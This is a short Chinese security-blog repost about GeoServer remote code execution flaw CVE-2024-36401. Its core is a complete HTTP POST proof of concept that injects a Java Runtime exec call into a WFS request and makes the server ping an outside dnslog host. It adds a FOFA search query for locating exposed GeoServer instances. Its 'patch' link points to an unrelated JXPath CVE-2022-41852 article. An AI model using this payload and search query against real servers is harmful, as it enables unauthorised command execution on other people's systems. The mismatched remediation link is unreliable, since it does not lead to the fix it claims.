GeoServer远程代码执行漏洞-CVE-2024-36401

admin 2024年7月3日20:44:32评论10 views字数 742阅读2分28秒阅读模式
GeoServer远程代码执行漏洞-CVE-2024-36401

漏洞影响范围

GeoServer远程代码执行漏洞-CVE-2024-36401

漏洞复现

poc

POST /geoserver/wfs HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Connection: closeContent-Length: 320

<wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'valueReference='exec(java.lang.Runtime.getRuntime(),"ping xxx.dnslog.cn")'><wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>

出现如下数据代表漏洞存在:查看dnslog

GeoServer远程代码执行漏洞-CVE-2024-36401

GeoServer远程代码执行漏洞-CVE-2024-36401

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

1.https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

搜索语法

fofa:app="GeoServer"

原文始发于微信公众号(小白菜安全):GeoServer远程代码执行漏洞-CVE-2024-36401

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日20:44:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GeoServer远程代码执行漏洞-CVE-2024-36401http://cn-sec.com/archives/2915938.html

发表评论

匿名网友 填写信息